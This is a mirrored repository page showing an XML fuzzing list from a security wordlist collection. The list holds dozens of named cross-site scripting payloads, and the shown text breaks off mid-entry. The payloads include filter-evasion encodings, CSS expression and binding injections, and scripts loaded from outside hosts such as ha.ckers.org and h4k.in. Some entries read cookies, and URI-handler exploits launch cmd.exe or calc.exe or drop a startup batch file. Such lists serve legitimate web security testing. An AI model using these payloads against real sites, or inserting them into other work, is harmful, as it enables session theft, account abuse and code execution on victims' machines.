Backup_Repos/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists synced 2026-04-14 02:54:32 +02:00
Code Issues Projects Releases Wiki Activity
SecLists/Fuzzing/XSS/human-friendly/XSS-EnDe-h4k.xml
Mo Langning d0b72e7e31 duplicated files
2024-02-14 12:24:12 +00:00

1287 lines
41 KiB
XML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<?xml version="1.0"?>
<!-- from: http://h4k.in/encoding/
date: 22-feb-08
converted from HTML to XML
modiefied: 05-dec-11; all ” replaced by \" and all replaced by '
-->
<xss>
<attack>
<name>Add onclick event hadler</name>
<code>onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</code>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;s&gt;000&lt;s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&amp;#60&amp;#115&amp;#62&amp;#51&amp;#51&amp;#51&amp;#60&amp;#47&amp;#115&amp;#62&amp;#x3c&amp;#x73&amp;#x3e&amp;#x34&amp;#x34&amp;#x34&amp;#x3c&amp;#x2f&amp;#x73&amp;#x3e</code>
<name>Advanced HTML injection locator</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>';alert(0)//\';alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;'&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{}&quot;);}alert(6);function xss(){//</code>
<name>Advanced XSS Locator</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>';alert(0)//\';alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;'&gt;&lt;/title&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{&lt;/title&gt;&lt;script&gt;alert(5)&lt;/script&gt;}&quot;);}</code>
<name>Advanced XSS Locator for title-Injections</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>aim: &amp;c:\windows\system32\calc.exe&quot; ini=&quot;C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat&quot;</code>
<name>aim: uri exploit</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;div/style=&amp;#92&amp;#45&amp;#92&amp;#109&amp;#111&amp;#92&amp;#122&amp;#92&amp;#45&amp;
#98&amp;#92&amp;#105&amp;#92&amp;#110&amp;#100&amp;#92&amp;#105&amp;#110&amp;#92&amp;#103:&amp;
#92&amp;#117&amp;#114&amp;#108&amp;#40&amp;#47&amp;#47&amp;#98&amp;#117&amp;#115&amp;#105&amp;
#110&amp;#101&amp;#115&amp;#115&amp;#92&amp;#105&amp;#92&amp;#110&amp;#102&amp;#111&amp;#46&amp;
#99&amp;#111&amp;#46&amp;#117&amp;#107&amp;#92&amp;#47&amp;#108&amp;#97&amp;#98&amp;#115
&amp;#92&amp;#47&amp;#120&amp;#98&amp;#108&amp;#92&amp;#47&amp;#120&amp;#98&amp;#108&amp;#92
&amp;#46&amp;#120&amp;#109&amp;#108&amp;#92&amp;#35&amp;#120&amp;#115&amp;#115&amp;#41&amp;&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;div&amp;nbsp;style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;div&amp;nbsp &amp;nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)&gt;</code>
<name>Backslash-obfuscated XBL injection - variant 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BASE HREF=&quot;javascript:alert('XSS');//&quot;&gt;</code>
<name>BASE</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>`&gt; &lt;script&gt;alert(5)&lt;/script&gt;</code>
<name>Basic back ticked attribute breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&gt; &lt;script&gt;alert(4)&lt;/script&gt;</code>
<name>Basic double quoted attribute breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>xyz onerror=alert(6); </code>
<name>Basic JS breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>1;a=eval;b=alert;a(b(/c/.source));</code>
<name>Basic JS breaker variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>1];a=eval;b=alert;a(b(17));//</code>
<name>Basic JS breaker variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>];a=eval;b=alert;a(b(16));//</code>
<name>Basic JS breaker variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'];a=eval;b=alert;a(b(15));//</code>
<name>Basic JS breaker variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>1};a=eval;b=alert;a(b(14));//</code>
<name>Basic JS breaker variant 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'};a=eval;b=alert;a(b(13));//</code>
<name>Basic JS breaker variant 6</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>};a=eval;b=alert;a(b(12));//</code>
<name>Basic JS breaker variant 7</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=1;a=eval;b=alert;a(b(11));//</code>
<name>Basic JS breaker variant 8</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>;//%0da=eval;b=alert;a(b(10));//</code>
<name>Basic JS breaker variant 9</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>';//%0da=eval;b=alert;a(b(9));//</code>
<name>Basic JS breaker variant 10</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'&gt; &lt;script&gt;alert(3)&lt;/script&gt;</code>
<name>Basic single quoted attribute breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code>
<name>Basic title breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BGSOUND SRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>BGSOUND</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BODY BACKGROUND=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>BODY background-image</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BODY ONLOAD=alert('XSS')&gt;</code>
<name>BODY ONLOAD</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;!--
&lt;A href=&quot;
- --&gt;&lt;a href=javascript:alert:document.domain
&gt;test--&gt;</code>
<name>Camouflaged comment injection with JS link</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;</code>
<name>Case Insensitive</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;%3C&amp;lt&amp;lt;&amp;LT&amp;LT;&amp;#60&amp;#060&amp;#0060&amp;#00060&amp;#000060&amp;#0000060&amp;#60;&amp;#060;&amp;#0060;&amp;#00060;&amp;#000060;&amp;#0000060;&amp;#x3c&amp;#x03c&amp;#x003c&amp;#x0003c&amp;#x00003c&amp;#x000003c&amp;#x3c;&amp;#x03c;&amp;#x003c;&amp;#x0003c;&amp;#x00003c;&amp;#x000003c;&amp;#X3c&amp;#X03c&amp;#X003c&amp;#X0003c&amp;#X00003c&amp;#X000003c&amp;#X3c;&amp;#X03c;&amp;#X003c;&amp;#X0003c;&amp;#X00003c;&amp;#X000003c;&amp;#x3C&amp;#x03C&amp;#x003C&amp;#x0003C&amp;#x00003C&amp;#x000003C&amp;#x3C;&amp;#x03C;&amp;#x003C;&amp;#x0003C;&amp;#x00003C;&amp;#x000003C;&amp;#X3C&amp;#X03C&amp;#X003C&amp;#X0003C&amp;#X00003C&amp;#X000003C&amp;#X3C;&amp;#X03C;&amp;#X003C;&amp;#X0003C;&amp;#X00003C;&amp;#X000003C;\x3c\x3C\u003c\u003C</code>
<name>Character Encoding Example</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;script&gt;
var a = &quot;&lt;/script&gt; &lt;script&gt; alert('XSS !'); &lt;/script&gt; &lt;script&gt;&quot;;
&lt;/script&gt;</code>
<name>Closing JS Tag in JS String assignment</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;</code>
<name>Commented-out Block</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>*/a=eval;b=alert;a(b(/e/.source));/*</code>
<name>Comment-breaker using obfuscated JavaScript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>width: expression((window.r==document.cookie)?'':alert(r=document.cookie))</code>
<name>Conditional style injection for IE</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Content Replace</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;&quot;&gt;</code>
<name>Cookie Manipulation</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;DIV STYLE=&quot;background-image: url(javascript:alert('XSS'))&quot;&gt;</code>
<name>DIV background-image 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert('XSS'))&quot;&gt;</code>
<name>DIV background-image 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;DIV STYLE=&quot;width: expression(alert('XSS'));&quot;&gt;</code>
<name>DIV expression</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&quot;&gt;</code>
<name>DIV w/Unicode</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;</code>
<name>Double open angle brackets</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Dword Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
<name>Embed Flash</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert('XSS');&quot;&gt;</code>
<name>Embedded Carriage Return</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert('XSS');&quot;&gt;</code>
<name>Embedded Encoded Tab</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert('XSS');&quot;&gt;</code>
<name>Embedded Newline</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>Embedded Tab</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);&lt;/SCRIPT&gt;</code>
<name>End title tag</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>\&quot;;alert('XSS');//</code>
<name>Escaping JavaScript escapes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT a=&quot;blah&quot; '' SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT &quot;a='&gt;'&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>eval(name)</code>
<name>Eval string contained in name property</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;</code>
<name>Extra dot for Absolute DNS</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;</code>
<name>Extraneous Open Brackets</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Filter Evasion 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT a=&quot;&gt;'&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Filter Evasion 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;</code>
<name>Firefox Lookups 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;</code>
<name>Firefox Lookups 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;</code>
<name>Firefox Lookups 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>firefoxurl:test|&quot;%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');&quot;</code>
<name>firefoxurl: uri exploit (UXSS)</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/FRAMESET&gt;</code>
<name>FRAME</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=`javascript:alert(&quot;RSnake says### 'XSS'&quot;)`&gt;</code>
<name>Grave Accents</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;javascript:alert('XSS')&quot;</code>
<name>Half-Open HTML/JavaScript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Hex Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</code>
<name>Hex Encoding w/out Semicolons</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;</code>
<name>HTML Entities</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'';!--&quot;&lt;script&gt;alert(0);&lt;/script&gt;=&amp;{(alert(1))}</code>
<name>HTML Quoute &amp; Comment breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;html:html xmlns:html='http://www.w3.org/1999/xhtml'&gt;
&lt;html:script&gt;
alert(document.cookie);
&lt;/html:script&gt;
&lt;/html:html&gt;</code>
<name>HTML wrapped in XML</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;img src=`x` onrerror= ` ;; alert(1) ` /&gt;</code>
<name>IE backticked semicolon injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/a style=&quot;&quot;xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')&quot;&gt;</code>
<name>IE closing-tag expression injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code> style=color: expression(alert(0));&quot; a=&quot;</code>
<name>IE expression injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>vbscript:Execute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))&lt;</code>
<name>IE VB Messagebox injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IFRAME SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/IFRAME&gt;</code>
<name>IFRAME</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=&lt;a&gt;
&lt;b&gt;
%3c%69%6d%67%2f%73%72%63%3d%31
%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e
&lt;/b&gt;
&lt;/a&gt;
document.write(unescape(a..b))</code>
<name>Image onerror wrapped in XML statement</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;</code>
<name>Image tag with obfuscated JS URI</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=javascript:alert(String.fromCharCode(88###83###83))&gt;</code>
<name>Image w/CharCode</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG DYNSRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>IMG Dynsrc</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
<name>IMG Embedded commands 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</code>
<name>IMG Embedded commands 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG LOWSRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>IMG Lowsrc</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=javascript:alert('XSS')&gt;</code>
<name>IMG No Quotes/Semicolon</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>exp/*&lt;XSS STYLE='no\xss:noxss(&quot;*//*&quot;);xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))'&gt;</code>
<name>IMG STYLE w/expression</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>IMG w/JavaScript Directive</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC='vbscript:msgbox(&quot;XSS&quot;)'&gt;</code>
<name>IMG w/VBscript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>INPUT Image</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<name>IP Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1</code>
<name>JavaScript concatenation vector variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;</code>
<name>JavaScript concatenation vector variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);</code>
<name>JavaScript concatenation vector variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];</code>
<name>JavaScript concatenation vector variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];</code>
<name>JavaScript concatenation vector variant 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=!''&amp;&amp;'jav';s2=!''&amp;&amp;'ascript';s3=!''&amp;&amp;':';s4=!''&amp;&amp;'aler';s5=!''&amp;&amp;'t';s6=!''&amp;&amp;'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;</code>
<name>JavaScript concatenation vector variant 6</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';</code>
<name>JavaScript concatenation vector variant 7</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BR SIZE=&quot;&amp;{alert('XSS')}&quot;&gt;</code>
<name>JavaScript Includes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;javascript:document.location='http://www.google.com/'&quot;&gt;XSS&lt;/A&gt;</code>
<name>JavaScript Link Location</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>%0da=eval;b=alert;a(b(/d/.source));</code>
<name>JavaScript-breaker using carriage return</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;a href = &quot;javas cript :ale rt(1)&quot;&gt;test</code>
<name>JS link with whitespace obfuscation</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>+alert(0)+</code>
<name>JS string concatenation breaker</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;</code>
<name>JSON based obfuscated onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body onload=a1={x:this.parent.document};a1.x.writeln(1);&gt;</code>
<name>JSON based onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;</code>
<name>JSON based semicolon-onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
<name>LAYER</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert('XSS')&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</code>
<name>List-style-image</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;</code>
<name>Livescript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;</code>
<name>Local .htc file</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</code>
<name>Long UTF-8 Unicode w/out Semicolons</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;</code>
<name>Malformed IMG Tags</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</code>
<name>Markup breaker with special quotes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert('XSS');&quot;&gt;</code>
<name>META</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert('XSS');&quot;&gt;</code>
<name>META w/additional URL parameter</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;</code>
<name>META w/data:URL</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Mixed Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;</code>
<name>Mocha</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code> style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);&quot; a=&quot;</code>
<name>Mozilla -moz-binding-url injection</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code> sstyle=foobar&quot;tstyle=&quot;foobar&quot;ystyle=&quot;foobar&quot;lstyle=&quot;foobar&quot;estyle=&quot;foobar&quot;=-moz-binding:url(http://h4k.in/mozxss.xml#xss)&gt;foobar&lt;/b&gt;#xss)&quot; a=&quot;</code>
<name>Mozilla -moz-binding-url injection - filter evading</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>_
=
eval
b=1
__
=
location
c=1
_
(
__
.
hash
//
.
substr
(1)
)</code>
<name>Multiline selfcontained XSS</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMGSRC=&quot;javascript:alert('XSS')&quot;&gt;</code>
<name>Multiline w/Carriage Returns</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name</code>
<name>Name contained XSS variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=/ev///
.source a+=/al///
.source a[a] (name)</code>
<name>Name contained XSS variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=/ev/
.source a+=/al/
.source,a = a[a] a(name)</code>
<name>Name contained XSS variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>setTimeout//
(name// ,0)</code>
<name>Name contained XSS variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>navigatorurl:test&quot; -chrome &quot;javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)</code>
<name>navigatorurl: code execution</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js</code>
<name>No Closing Script Tag</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;</code>
<name>No Quotes/Semicolons</name>
<desc></desc>
<label></label>
</attack>
<attack>
